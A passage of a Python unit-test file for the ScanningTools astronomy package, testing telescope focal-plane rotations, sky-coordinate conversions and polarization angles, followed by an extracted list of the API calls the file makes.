fpp2 = st.get_fp_rotations(phi2, theta2, psi2, x_fp, n_horns, time2, n=n1, cartesian=False)
fpp3 = st.get_fp_rotations(phi1, theta1, psi1, x_fp, n_horns, time1, n=n2, cartesian=False)
fpp4 = st.get_fp_rotations(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2, cartesian=False)
Alt1, Az1 = st.get_horizon_coordinates(fpp1)
Alt2, Az2 = st.get_horizon_coordinates(fpp2)
Alt3, Az3 = st.get_horizon_coordinates(fpp3)
Alt4, Az4 = st.get_horizon_coordinates(fpp4)
Dec1, Ra1 = st.get_icrs_coordinates(JD1, loc, Alt1, Az1) #1 day 2; n = 48
Dec2, Ra2 = st.get_icrs_coordinates(JD2, loc, Alt2, Az2) #2 day all; n = 48
Dec3, Ra3 = st.get_icrs_coordinates(JD1, loc, Alt3, Az3) #3 day 2; n = all
Dec4, Ra4 = st.get_icrs_coordinates(JD2, loc, Alt4, Az4) #4 day all; n = all
Dec5, Ra5 = st.get_icrs_coordinates(JD1[0], loc, Alt1, Az1) #5 day 2 [t=0]; n = 48
self.assertTrue(np.allclose(Dec1, Dec3[n1]))
self.assertTrue(np.allclose(Ra1, Ra3[n1]))
self.assertTrue(np.allclose(Dec1, Dec2[len(Dec1):]))
self.assertTrue(np.allclose(Ra1, Ra2[len(Ra1):]))
self.assertTrue(np.allclose(Dec1, Dec4[n1, len(Dec1):]))
self.assertTrue(np.allclose(Ra1, Ra4[n1, len(Dec1):]))
self.assertTrue(np.allclose(Dec1[0], Dec5[0]))
self.assertTrue(np.allclose(Ra1[0], Ra5[0]))
self.assertFalse(np.allclose(Dec1[1:], Dec5[1:]))
self.assertFalse(np.allclose(Ra1[1:], Ra5[1:]))
def pointing_test(name, JD, loc):
object = SkyCoord.from_name(name)
object_AltAz = object.transform_to(AltAz(obstime=Time(JD, format='jd'), location=loc))
object_Alt = object_AltAz.alt.rad
object_Az = object_AltAz.az.rad
object_Dec, object_Ra = st.get_icrs_coordinates(JD1, loc, object_Alt, object_Az)
self.assertTrue(np.allclose(object.dec.rad, object_Dec))
self.assertTrue(np.allclose(object.ra.rad, object_Ra))
name1, name2, name3 = ('M33', 'crab', 'NCG67')
pointing_test(name1, JD1, loc)
pointing_test(name2, JD1, loc)
pointing_test(name3, JD1, loc)
def test_get_practical_icrs_coordinates(self):
def general_tests(Dec, Ra, PDec, PRa, accuracy):
self.assertTrue((np.abs(Dec - PDec) <= accuracy).all())
diff_Ra = np.abs(Ra - PRa).ravel()
diff_Ra[diff_Ra > 6] = 2 * np.pi - diff_Ra[diff_Ra > 6]
self.assertTrue((diff_Ra <= accuracy).all())
x_fp, n_horns = st.get_full_fp('./ScanningTools/fp_data/fp_theta.txt',
'./ScanningTools/fp_data/fp_phi.txt')
obs_time = (0, 2, 0, 0, 0)
sampling_rate = 0.01
rpm = 3
day1 = 2
n1, n2 = (48, None)
obs_t1, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day1)
theta1, phi1, psi1 = st.get_engine_rotations(time1, rpm, zenith_distance,
polarization_angle)
fpp1 = st.get_fp_rotations(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1, cartesian=False)
fpp3 = st.get_fp_rotations(phi1, theta1, psi1, x_fp, n_horns, time1, n=n2, cartesian=False)
Alt1, Az1 = st.get_horizon_coordinates(fpp1)
Alt3, Az3 = st.get_horizon_coordinates(fpp3)
Dec1, Ra1 = st.get_icrs_coordinates(JD1, loc, Alt1, Az1) #1 day 2; n = 48
Dec3, Ra3 = st.get_icrs_coordinates(JD1, loc, Alt3, Az3) #3 day 2; n = all
PDec1, PRa1 = st.get_practical_icrs_coordinates(JD1, loc, Alt1, Az1) #1 day 2; n = 48
PDec3, PRa3 = st.get_practical_icrs_coordinates(JD1, loc, Alt3, Az3) #3 day 2; n = all
accuracy = st.sex2dec(pointing_accuracy)
general_tests(Dec1, Ra1, PDec1, PRa1, accuracy)
general_tests(Dec3, Ra3, PDec3, PRa3, accuracy)
def test_get_polarization_angles(self):
def general_tests(x_fp_pol_versors, pol_ang_proj, fp_pol_pointings):
self.assertTrue((np.max(pol_ang_proj, axis=-1) <= np.pi).all())
self.assertTrue((np.min(pol_ang_proj, axis=-1) >= -np.pi).all())
zenith_distance, zenith_distance1 = (0, 10)
boresight_angle = 0
obs_time, obs_time1 = ((0, 0, 0, 1, 0), (0, 1, 0, 0, 0))
sampling_rate, sampling_rate1 = (50, 1)
rpm, rpm1 = (1, 5)
day, day1 = (None, 1)
n, n1 = (0, None)
obs_t, time, JD = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day)
obs_t1, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC,
DST=DST, day=day1)
theta, phi, psi = st.get_engine_rotations(time, rpm, zenith_distance, boresight_angle)
theta1, phi1, psi1 = st.get_engine_rotations(time1, rpm1, zenith_distance1, boresight_angle)
theta2, phi2, psi2 = st.get_engine_rotations(time1, rpm1, zenith_distance, boresight_angle)
x_fp_pol_angles, x_fp_pol_versors = st.get_full_fp_polarization_angles(
'./ScanningTools/fp_data/fp_psi.txt')
n_horns = len(x_fp_pol_versors)
fp_pol_pointings = st.get_fp_rotations(phi, theta, psi, x_fp_pol_versors, n_horns, time,
n=n, cartesian=True) #rad
fp_pol_pointings1 = st.get_fp_rotations(phi1, theta1, psi1, x_fp_pol_versors, n_horns,
time1, n=n1, cartesian=True) #rad
pol_ang_proj = st.get_polarization_angles(phi, theta, psi, x_fp_pol_versors, n_horns, time,
n=n)
pol_ang_proj1 = st.get_polarization_angles(phi1, theta1, psi1, x_fp_pol_versors, n_horns,
time1, n=n1)
pol_ang_proj2 = st.get_polarization_angles(phi2, theta2, psi2, x_fp_pol_versors, n_horns,
time1, n=n1)
pol_ang_proj_expected = np.concatenate((
np.linspace(0, np.pi, sampling_rate * obs_t / 2 + 1),
np.linspace(-np.pi, 0, sampling_rate * obs_t / 2 + 1)[1:-1]))
self.assertTrue(np.allclose(np.arctan2(x_fp_pol_versors[..., 1], x_fp_pol_versors[..., 0]),
x_fp_pol_angles))
self.assertTrue(np.allclose(pol_ang_proj2[..., 0], x_fp_pol_angles))
self.assertTrue(np.allclose(pol_ang_proj, pol_ang_proj_expected))
general_tests(x_fp_pol_versors, pol_ang_proj, fp_pol_pointings)
general_tests(x_fp_pol_versors, pol_ang_proj1, fp_pol_pointings1)
def test_get_scanning_strategy(self):
def general_tests(packed_values):
(x_fp, x_fp_pol_angles, n_horns, time, JD, theta, phi, psi, fp_pointings_spherical, Alt,
Az, Dec, Ra, polarization_angles) = packed_values
self.assertTrue(np.allclose(x_fp.shape, (49, 3)))
self.assertTrue(np.allclose(x_fp_pol_angles.shape, 49))
self.assertEqual(n_horns, 49)
self.assertTrue(np.allclose(time.shape, JD.shape))
self.assertTrue(np.allclose(theta.shape, JD.shape))
self.assertTrue(np.allclose(theta.shape, phi.shape))
self.assertTrue(np.allclose(psi.shape, phi.shape))
self.assertTrue(np.allclose(psi.shape, fp_pointings_spherical.shape[-2]))
self.assertTrue(np.allclose(Alt.shape, fp_pointings_spherical.shape[:-1]))
self.assertTrue(np.allclose(Alt.shape, Az.shape))
self.assertTrue(np.allclose(Dec.shape, Az.shape))
self.assertTrue(np.allclose(Dec.shape, Ra.shape))
self.assertTrue(np.allclose(polarization_angles.shape, Ra.shape))
self.assertTrue(np.allclose(time.shape, Ra.shape[-1]))
self.assertTrue(np.allclose(fp_pointings_spherical.shape[-2], time.shape))
obs_time = (0, 2, 0, 0, 0)
sampling_rate = 2
zenith_distance, polarization_angle = (10, 0)
rpm = 5
n1, n2 = (15, None)
day1, day2 = (1, None)
packed_values1 = st.get_scanning_strategy(
obs_time, sampling_rate, zenith_distance, polarization_angle, rpm, n=n1, day=day2,
LCT_start=(0, 0, 0), LCD_start=(1, 1, 2018), UTC=0, DST=0, LAT=np.array([28, 16, 24]),
LONG=np.array([-16, 38, 32]), Height=2400,
fp_theta_path='./ScanningTools/fp_data/fp_theta.txt',
fp_phi_path='./ScanningTools/fp_data/fp_phi.txt',
fp_psi_path='./ScanningTools/fp_data/fp_psi.txt')
packed_values2 = st.get_scanning_strategy(
obs_time, sampling_rate, zenith_distance, polarization_angle, rpm, n=n2, day=day1,
LCT_start=(0, 0, 0), LCD_start=(1, 1, 2018), UTC=0, DST=0, LAT=np.array([28, 16, 24]),
LONG=np.array([-16, 38, 32]), Height=2400,
fp_theta_path='./ScanningTools/fp_data/fp_theta.txt',
fp_phi_path='./ScanningTools/fp_data/fp_phi.txt',
fp_psi_path='./ScanningTools/fp_data/fp_psi.txt')
general_tests(packed_values1)
general_tests(packed_values2)
if __name__ == '__main__':
unittest.main()
| [
"ScanningTools.ScanningTools.dec2sex",
"numpy.radians",
"ScanningTools.ScanningTools.spin_generator",
"numpy.array",
"ScanningTools.ScanningTools.get_full_fp_polarization_angles",
"numpy.arctan2",
"unittest.main",
"ScanningTools.ScanningTools.get_nside_eff",
"ScanningTools.ScanningTools.hours2degree... | [((298, 364), 'numpy.array', 'np.array', (['[[-10, 45, 59], [30, 35, 15], [-180, 25, 20], [3, 4, 5]]'], {}), '([[-10, 45, 59], [30, 35, 15], [-180, 25, 20], [3, 4, 5]])\n', (306, 364), True, 'import numpy as np\n'), ((425, 462), 'numpy.array', 'np.array', (['[[23, 59, 16], [7, 56, 59]]'], {}), '([[23, 59, 16], [7, 56, 59]])\n', (433, 462), True, 'import numpy as np\n'), ((486, 541), 'numpy.array', 'np.array', (['[1.546585, -0.56, 0.3333333333333333, -1.001]'], {}), '([1.546585, -0.56, 0.3333333333333333, -1.001])\n', (494, 541), True, 'import numpy as np\n'), ((601, 621), 'numpy.array', 'np.array', (['[0, 0, 25]'], {}), '([0, 0, 25])\n', (609, 621), True, 'import numpy as np\n'), ((676, 698), 'numpy.array', 'np.array', (['[28, 16, 24]'], {}), '([28, 16, 24])\n', (684, 698), True, 'import numpy as np\n'), ((711, 734), 'numpy.array', 'np.array', (['[-16, 38, 32]'], {}), '([-16, 38, 32])\n', (719, 734), True, 'import numpy as np\n'), ((764, 798), 'ScanningTools.ScanningTools.get_location', 'st.get_location', (['LAT', 'LONG', 'Height'], {}), '(LAT, LONG, Height)\n', (779, 798), True, 'from ScanningTools import ScanningTools as st\n'), ((33054, 33069), 'unittest.main', 'unittest.main', ([], {}), '()\n', (33067, 33069), False, 'import unittest\n'), ((1136, 1204), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(1)', 'days': '(0)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)', 'sidereal': '(True)'}), '(years=1, days=0, hours=0, min=0, sec=0, sidereal=True)\n', (1149, 1204), True, 'from ScanningTools import ScanningTools as st\n'), ((1230, 1283), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(1)', 'days': '(0)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)'}), '(years=1, days=0, hours=0, min=0, sec=0)\n', (1243, 1283), True, 'from ScanningTools import ScanningTools as st\n'), ((1311, 1379), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(0)', 'days': '(1)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)', 'sidereal': '(True)'}), '(years=0, days=1, hours=0, min=0, sec=0, sidereal=True)\n', (1324, 1379), True, 'from ScanningTools import ScanningTools as st\n'), ((1404, 1457), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(0)', 'days': '(1)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)'}), '(years=0, days=1, hours=0, min=0, sec=0)\n', (1417, 1457), True, 'from ScanningTools import ScanningTools as st\n'), ((1477, 1545), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(1)', 'days': '(1)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)', 'sidereal': '(True)'}), '(years=1, days=1, hours=0, min=0, sec=0, sidereal=True)\n', (1490, 1545), True, 'from ScanningTools import ScanningTools as st\n'), ((1565, 1634), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(5)', 'days': '(30)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)', 'sidereal': '(True)'}), '(years=5, days=30, hours=0, min=0, sec=0, sidereal=True)\n', (1578, 1634), True, 'from ScanningTools import ScanningTools as st\n'), ((1654, 1723), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(2)', 'days': '(17)', 'hours': '(0)', 'min': '(0)', 'sec': '(0)', 'sidereal': '(True)'}), '(years=2, days=17, hours=0, min=0, sec=0, sidereal=True)\n', (1667, 1723), True, 'from ScanningTools import ScanningTools as st\n'), ((1743, 1815), 'ScanningTools.ScanningTools.period2sec', 'st.period2sec', ([], {'years': '(10)', 'days': '(21)', 'hours': '(15)', 'min': '(3)', 'sec': '(25)', 'sidereal': '(True)'}), '(years=10, days=21, hours=15, min=3, sec=25, sidereal=True)\n', (1756, 1815), True, 'from ScanningTools import ScanningTools as st\n'), ((2255, 2273), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['angles'], {}), '(angles)\n', (2265, 2273), True, 'from ScanningTools import ScanningTools as st\n'), ((2289, 2324), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['angles[0]'], {'radians': '(True)'}), '(angles[0], radians=True)\n', (2299, 2324), True, 'from ScanningTools import ScanningTools as st\n'), ((2588, 2601), 'ScanningTools.ScanningTools.dec2sex', 'st.dec2sex', (['t'], {}), '(t)\n', (2598, 2601), True, 'from ScanningTools import ScanningTools as st\n'), ((2616, 2632), 'ScanningTools.ScanningTools.dec2sex', 'st.dec2sex', (['t[0]'], {}), '(t[0])\n', (2626, 2632), True, 'from ScanningTools import ScanningTools as st\n'), ((2930, 2954), 'ScanningTools.ScanningTools.degrees2hours', 'st.degrees2hours', (['angles'], {}), '(angles)\n', (2946, 2954), True, 'from ScanningTools import ScanningTools as st\n'), ((2970, 3011), 'ScanningTools.ScanningTools.degrees2hours', 'st.degrees2hours', (['angles[2]'], {'decimal': '(True)'}), '(angles[2], decimal=True)\n', (2986, 3011), True, 'from ScanningTools import ScanningTools as st\n'), ((3231, 3257), 'ScanningTools.ScanningTools.hours2degrees', 'st.hours2degrees', (['hours[1]'], {}), '(hours[1])\n', (3247, 3257), True, 'from ScanningTools import ScanningTools as st\n'), ((3273, 3310), 'ScanningTools.ScanningTools.hours2degrees', 'st.hours2degrees', (['hours'], {'decimal': '(True)'}), '(hours, decimal=True)\n', (3289, 3310), True, 'from ScanningTools import ScanningTools as st\n'), ((3632, 3699), 'ScanningTools.ScanningTools.LocalCivilTime2JulianDay', 'st.LocalCivilTime2JulianDay', (['(3, 37, 0)', '(1, 7, 2013)'], {'UTC': '(4)', 'DST': '(1)'}), '((3, 37, 0), (1, 7, 2013), UTC=4, DST=1)\n', (3659, 3699), True, 'from ScanningTools import ScanningTools as st\n'), ((3722, 3790), 'ScanningTools.ScanningTools.LocalCivilTime2JulianDay', 'st.LocalCivilTime2JulianDay', (['(18, 0, 0)', '(19, 6, 2009)'], {'UTC': '(0)', 'DST': '(0)'}), '((18, 0, 0), (19, 6, 2009), UTC=0, DST=0)\n', (3749, 3790), True, 'from ScanningTools import ScanningTools as st\n'), ((4394, 4409), 'ScanningTools.ScanningTools.dec2sex', 'st.dec2sex', (['(0.1)'], {}), '(0.1)\n', (4404, 4409), True, 'from ScanningTools import ScanningTools as st\n'), ((4434, 4520), 'ScanningTools.ScanningTools.LocalCivilTime2LocalSiderealTime', 'st.LocalCivilTime2LocalSiderealTime', (['(18, 0, 0)', '(19, 6, 2009)', 'LONG'], {'UTC': '(0)', 'DST': '(0)'}), '((18, 0, 0), (19, 6, 2009), LONG, UTC=0,\n DST=0)\n', (4469, 4520), True, 'from ScanningTools import ScanningTools as st\n'), ((4785, 4804), 'numpy.array', 'np.array', (['[0, 5, 0]'], {}), '([0, 5, 0])\n', (4793, 4804), True, 'import numpy as np\n'), ((4840, 4860), 'numpy.array', 'np.array', (['[0, 21, 0]'], {}), '([0, 21, 0])\n', (4848, 4860), True, 'import numpy as np\n'), ((4896, 4916), 'numpy.array', 'np.array', (['[0, 32, 0]'], {}), '([0, 32, 0])\n', (4904, 4916), True, 'import numpy as np\n'), ((5434, 5530), 'ScanningTools.ScanningTools.get_full_fp', 'st.get_full_fp', (['"""./ScanningTools/fp_data/fp_theta.txt"""', '"""./ScanningTools/fp_data/fp_phi.txt"""'], {}), "('./ScanningTools/fp_data/fp_theta.txt',\n './ScanningTools/fp_data/fp_phi.txt')\n", (5448, 5530), True, 'from ScanningTools import ScanningTools as st\n'), ((6770, 6842), 'ScanningTools.ScanningTools.get_full_fp_polarization_angles', 'st.get_full_fp_polarization_angles', (['"""./ScanningTools/fp_data/fp_psi.txt"""'], {}), "('./ScanningTools/fp_data/fp_psi.txt')\n", (6804, 6842), True, 'from ScanningTools import ScanningTools as st\n'), ((10124, 10216), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day)\n', (10137, 10216), True, 'from ScanningTools import ScanningTools as st\n'), ((10300, 10338), 'astropy.time.Time', 'Time', (['JD[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0], format='jd', location=loc)\n", (10304, 10338), False, 'from astropy.time import Time\n'), ((10352, 10403), 'astropy.time.Time', 'Time', (['(JD[0] + JD_step[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0] + JD_step[0], format='jd', location=loc)\n", (10356, 10403), False, 'from astropy.time import Time\n'), ((10535, 10627), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day)\n', (10548, 10627), True, 'from ScanningTools import ScanningTools as st\n'), ((10711, 10749), 'astropy.time.Time', 'Time', (['JD[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0], format='jd', location=loc)\n", (10715, 10749), False, 'from astropy.time import Time\n'), ((10763, 10814), 'astropy.time.Time', 'Time', (['(JD[0] + JD_step[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0] + JD_step[0], format='jd', location=loc)\n", (10767, 10814), False, 'from astropy.time import Time\n'), ((11012, 11104), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day)\n', (11025, 11104), True, 'from ScanningTools import ScanningTools as st\n'), ((11188, 11226), 'astropy.time.Time', 'Time', (['JD[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0], format='jd', location=loc)\n", (11192, 11226), False, 'from astropy.time import Time\n'), ((11240, 11291), 'astropy.time.Time', 'Time', (['(JD[0] + JD_step[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD[0] + JD_step[0], format='jd', location=loc)\n", (11244, 11291), False, 'from astropy.time import Time\n'), ((11589, 11682), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day0'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day0)\n', (11602, 11682), True, 'from ScanningTools import ScanningTools as st\n'), ((11773, 11812), 'astropy.time.Time', 'Time', (['JD0[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD0[0], format='jd', location=loc)\n", (11777, 11812), False, 'from astropy.time import Time\n'), ((11827, 11880), 'astropy.time.Time', 'Time', (['(JD0[0] + JD_step0[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD0[0] + JD_step0[0], format='jd', location=loc)\n", (11831, 11880), False, 'from astropy.time import Time\n'), ((12049, 12142), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day1)\n', (12062, 12142), True, 'from ScanningTools import ScanningTools as st\n'), ((12230, 12269), 'astropy.time.Time', 'Time', (['JD1[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD1[0], format='jd', location=loc)\n", (12234, 12269), False, 'from astropy.time import Time\n'), ((12284, 12337), 'astropy.time.Time', 'Time', (['(JD1[0] + JD_step1[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD1[0] + JD_step1[0], format='jd', location=loc)\n", (12288, 12337), False, 'from astropy.time import Time\n'), ((12506, 12599), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day2'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day2)\n', (12519, 12599), True, 'from ScanningTools import ScanningTools as st\n'), ((12690, 12729), 'astropy.time.Time', 'Time', (['JD2[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD2[0], format='jd', location=loc)\n", (12694, 12729), False, 'from astropy.time import Time\n'), ((12744, 12797), 'astropy.time.Time', 'Time', (['(JD2[0] + JD_step2[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD2[0] + JD_step2[0], format='jd', location=loc)\n", (12748, 12797), False, 'from astropy.time import Time\n'), ((12966, 13059), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day3'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day3)\n', (12979, 13059), True, 'from ScanningTools import ScanningTools as st\n'), ((13150, 13189), 'astropy.time.Time', 'Time', (['JD3[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD3[0], format='jd', location=loc)\n", (13154, 13189), False, 'from astropy.time import Time\n'), ((13204, 13257), 'astropy.time.Time', 'Time', (['(JD3[0] + JD_step3[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD3[0] + JD_step3[0], format='jd', location=loc)\n", (13208, 13257), False, 'from astropy.time import Time\n'), ((13458, 13552), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start4', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day4'}), '(LCT_start4, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day4)\n', (13471, 13552), True, 'from ScanningTools import ScanningTools as st\n'), ((13643, 13682), 'astropy.time.Time', 'Time', (['JD4[0]'], {'format': '"""jd"""', 'location': 'loc'}), "(JD4[0], format='jd', location=loc)\n", (13647, 13682), False, 'from astropy.time import Time\n'), ((13697, 13750), 'astropy.time.Time', 'Time', (['(JD4[0] + JD_step4[0])'], {'format': '"""jd"""', 'location': 'loc'}), "(JD4[0] + JD_step4[0], format='jd', location=loc)\n", (13701, 13750), False, 'from astropy.time import Time\n'), ((14766, 14861), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate1', 'obs_time1'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC, DST\n =DST, day=day1)\n', (14779, 14861), True, 'from ScanningTools import ScanningTools as st\n'), ((14915, 14945), 'ScanningTools.ScanningTools.spin_generator', 'st.spin_generator', (['time1', 'rpm1'], {}), '(time1, rpm1)\n', (14932, 14945), True, 'from ScanningTools import ScanningTools as st\n'), ((15055, 15150), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate2', 'obs_time2'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day2'}), '(LCT_start, LCD_start, sampling_rate2, obs_time2, UTC=UTC, DST\n =DST, day=day2)\n', (15068, 15150), True, 'from ScanningTools import ScanningTools as st\n'), ((15204, 15234), 'ScanningTools.ScanningTools.spin_generator', 'st.spin_generator', (['time2', 'rpm2'], {}), '(time2, rpm2)\n', (15221, 15234), True, 'from ScanningTools import ScanningTools as st\n'), ((15344, 15439), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate3', 'obs_time3'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day3'}), '(LCT_start, LCD_start, sampling_rate3, obs_time3, UTC=UTC, DST\n =DST, day=day3)\n', (15357, 15439), True, 'from ScanningTools import ScanningTools as st\n'), ((15493, 15523), 'ScanningTools.ScanningTools.spin_generator', 'st.spin_generator', (['time3', 'rpm3'], {}), '(time3, rpm3)\n', (15510, 15523), True, 'from ScanningTools import ScanningTools as st\n'), ((15686, 15737), 'numpy.radians', 'np.radians', (['([10, 10, 10], [30, 30, 30], [0, 0, 0])'], {}), '(([10, 10, 10], [30, 30, 30], [0, 0, 0]))\n', (15696, 15737), True, 'import numpy as np\n'), ((15751, 15795), 'ScanningTools.ScanningTools.euler_rotation_matrix', 'st.euler_rotation_matrix', (['phi1', 'theta1', 'psi1'], {}), '(phi1, theta1, psi1)\n', (15775, 15795), True, 'from ScanningTools import ScanningTools as st\n'), ((15809, 16003), 'numpy.array', 'np.array', (['[[0.984807753012208, -0.1503837331804353, 0.08682408883346515], [\n 0.17364817766693033, 0.8528685319524433, -0.49240387650610395], [0, \n 0.49999999999999994, 0.8660254037844387]]'], {}), '([[0.984807753012208, -0.1503837331804353, 0.08682408883346515], [\n 0.17364817766693033, 0.8528685319524433, -0.49240387650610395], [0, \n 0.49999999999999994, 0.8660254037844387]])\n', (15817, 16003), True, 'import numpy as np\n'), ((16074, 16128), 'numpy.radians', 'np.radians', (['([10, 10, 10], [30, 30, 30], [45, 45, 45])'], {}), '(([10, 10, 10], [30, 30, 30], [45, 45, 45]))\n', (16084, 16128), True, 'import numpy as np\n'), ((16142, 16186), 'ScanningTools.ScanningTools.euler_rotation_matrix', 'st.euler_rotation_matrix', (['phi2', 'theta2', 'psi2'], {}), '(phi2, theta2, psi2)\n', (16166, 16186), True, 'from ScanningTools import ScanningTools as st\n'), ((16200, 16411), 'numpy.array', 'np.array', (['[[0.5900268828079848, -0.8027015978320531, 0.08682408883346515], [\n 0.7258569263731611, 0.4802813184352156, -0.49240387650610395], [\n 0.3535533905932737, 0.35355339059327373, 0.8660254037844387]]'], {}), '([[0.5900268828079848, -0.8027015978320531, 0.08682408883346515], [\n 0.7258569263731611, 0.4802813184352156, -0.49240387650610395], [\n 0.3535533905932737, 0.35355339059327373, 0.8660254037844387]])\n', (16208, 16411), True, 'import numpy as np\n'), ((16483, 16536), 'numpy.radians', 'np.radians', (['([10, 10, 10], [30, 30, 30], [45, 0, 45])'], {}), '(([10, 10, 10], [30, 30, 30], [45, 0, 45]))\n', (16493, 16536), True, 'import numpy as np\n'), ((16550, 16594), 'ScanningTools.ScanningTools.euler_rotation_matrix', 'st.euler_rotation_matrix', (['phi3', 'theta3', 'psi3'], {}), '(phi3, theta3, psi3)\n', (16574, 16594), True, 'from ScanningTools import ScanningTools as st\n'), ((16608, 17219), 'numpy.array', 'np.array', (['[[[0.5900268828079848, -0.8027015978320531, 0.08682408883346515], [\n 0.7258569263731611, 0.4802813184352156, -0.49240387650610395], [\n 0.3535533905932737, 0.35355339059327373, 0.8660254037844387]], [[\n 0.984807753012208, -0.1503837331804353, 0.08682408883346515], [\n 0.17364817766693033, 0.8528685319524433, -0.49240387650610395], [0, \n 0.49999999999999994, 0.8660254037844387]], [[0.5900268828079848, -\n 0.8027015978320531, 0.08682408883346515], [0.7258569263731611, \n 0.4802813184352156, -0.49240387650610395], [0.3535533905932737, \n 0.35355339059327373, 0.8660254037844387]]]'], {}), '([[[0.5900268828079848, -0.8027015978320531, 0.08682408883346515],\n [0.7258569263731611, 0.4802813184352156, -0.49240387650610395], [\n 0.3535533905932737, 0.35355339059327373, 0.8660254037844387]], [[\n 0.984807753012208, -0.1503837331804353, 0.08682408883346515], [\n 0.17364817766693033, 0.8528685319524433, -0.49240387650610395], [0, \n 0.49999999999999994, 0.8660254037844387]], [[0.5900268828079848, -\n 0.8027015978320531, 0.08682408883346515], [0.7258569263731611, \n 0.4802813184352156, -0.49240387650610395], [0.3535533905932737, \n 0.35355339059327373, 0.8660254037844387]]])\n', (16616, 17219), True, 'import numpy as np\n'), ((17702, 17779), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', '(50)', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'None'}), '(LCT_start, LCD_start, 50, obs_time, UTC=UTC, DST=DST, day=None)\n', (17715, 17779), True, 'from ScanningTools import ScanningTools as st\n'), ((17862, 17933), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time', 'rpm', 'zenith_distance', 'polarization_angle'], {}), '(time, rpm, zenith_distance, polarization_angle)\n', (17885, 17933), True, 'from ScanningTools import ScanningTools as st\n'), ((18640, 18736), 'ScanningTools.ScanningTools.get_full_fp', 'st.get_full_fp', 